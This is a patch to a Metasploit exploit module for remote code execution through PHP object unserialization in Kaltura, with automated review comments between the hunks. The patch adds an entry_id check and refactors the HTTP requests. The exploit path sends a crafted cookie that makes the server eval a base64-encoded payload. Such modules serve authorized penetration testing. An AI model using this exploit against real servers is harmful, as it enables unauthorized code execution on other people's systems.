From 0ac7e0926cf28126ad279b45b9217e1d4f070bb9 Mon Sep 17 00:00:00 2001
From: Robin Verton
Date: Mon, 23 Oct 2017 15:19:35 +0200
Subject: [PATCH] Add entry_id verification; clean up http request calls
---
 .../http/kaltura_unserialize_cookie_rce.rb | 33 ++++++++++++++++---
 1 file changed, 29 insertions(+), 4 deletions(-)
diff --git a/modules/exploits/linux/http/kaltura_unserialize_cookie_rce.rb b/modules/exploits/linux/http/kaltura_unserialize_cookie_rce.rb
index 26c4a4b838..23d43db83a 100644
--- a/modules/exploits/linux/http/kaltura_unserialize_cookie_rce.rb
+++ b/modules/exploits/linux/http/kaltura_unserialize_cookie_rce.rb
@@ -74,7 +74,11 @@ class MetasploitModule < Msf::Exploit::Remote
 res = send_request_cgi(
 'method' => 'GET',
- 'uri' => normalize_uri(target_uri.path, "index.php/keditorservices/getAllEntries?list_type=15&entry_id=#{entry_id}"),
+ 'uri' => normalize_uri(target_uri.path, 'index.php', 'keditorservices', 'getAllEntries'),
+ 'vars_get' => {
+ 'list_type' => '15',
+ 'entry_id' => entry_id
+ },
 'headers' => {
 'Cookie' => "userzone=#{encoded}#{hash}"
 }
@@ -85,12 +89,29 @@ class MetasploitModule < Msf::Exploit::Remote
 Exploit::CheckCode::Safe
 elsif res && res.body.include?(r)
 Exploit::CheckCode::Vulnerable
+ elsif not self.check_entryid()
+ print_error("Invalid ENTRYID")
+ Exploit::CheckCode::Safe
 else
- print_warning("Did you use a valid entry_id?")
 Exploit::CheckCode::Safe
 end
 end
+ def check_entryid
+ entry_id = datastore['ENTRYID']
+ res = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path, 'index.php', 'keditorservices', 'getAllEntries'),
+ 'vars_get' => {
+ 'list_type' => '15',
+ 'entry_id' => entry_id
+ }
+ )
+
+ return res.body.include? entry_id
+
+ end
+
 def exploit
 entry_id = datastore['ENTRYID']
 cmd = "print_r(eval(base64_decode('#{Rex::Text.encode_base64(payload.encode)}'))).die()"
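Review bot: The request hash built in `check` (first hunk) is repeated almost verbatim in the new `check_entryid` and again in `exploit` (third hunk); only the `Cookie` header differs between the three. A small private helper that takes the entry id and an optional cookie value and builds the `'vars_get'` hash once would keep the call sites from drifting apart the next time the endpoint or a parameter changes. Moving the query string out of the interpolated path and into `'vars_get'` is the right direction, since the HTTP client then builds and encodes the parameters instead of the module concatenating them by hand. The body of `check` starts and ends outside this hunk, so the helper would have to be placed with the full method in view.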
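Review bot: `check_entryid` dereferences `res.body` without confirming that `send_request_cgi` returned a response, and the `elsif res && ...` guard just above it in `check` suggests this branch is reached precisely when `res` may be nil, so a timeout would raise NoMethodError instead of producing a check result; end the method with `res && res.body.include?(entry_id)`. Returning `Exploit::CheckCode::Safe` after printing "Invalid ENTRYID" reports the host as not affected when the probe could not be evaluated at all, which can give a false all-clear in an assessment; `Exploit::CheckCode::Unknown` describes that outcome accurately, and the same likely applies to the final `else`. The substring test may also pass if the server merely echoes the supplied id in an error page, so it is worth confirming what an invalid-entry response looks like. On style, `elsif !check_entryid` is preferable to `elsif not self.check_entryid()`, and the explicit `return` and the blank line before `end` can be dropped. The unguarded `res.body` in the `else` branch of `exploit` (last hunk) has the same nil problem.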
@@ -109,7 +130,11 @@ class MetasploitModule < Msf::Exploit::Remote
 res = send_request_cgi(
 'method' => 'GET',
- 'uri' => normalize_uri(target_uri.path, "index.php/keditorservices/getAllEntries?list_type=15&entry_id=#{entry_id}"),
+ 'uri' => normalize_uri(target_uri.path, 'index.php', 'keditorservices', 'getAllEntries'),
+ 'vars_get' => {
+ 'list_type' => '15',
+ 'entry_id' => entry_id
+ },
 'headers' => {
 'Cookie' => "userzone=#{encoded}#{hash}"
 }
@@ -118,7 +143,7 @@ class MetasploitModule < Msf::Exploit::Remote
 if res and res.redirect?
 print_error("Got a redirect, maybe you are not using https? #{res.headers['Location']}")
 elsif res and res.code != 200
- print_error("Unexpected response...")
+ print_error('Unexpected response...')
 else
 print_status("Output: #{res.body}")
 end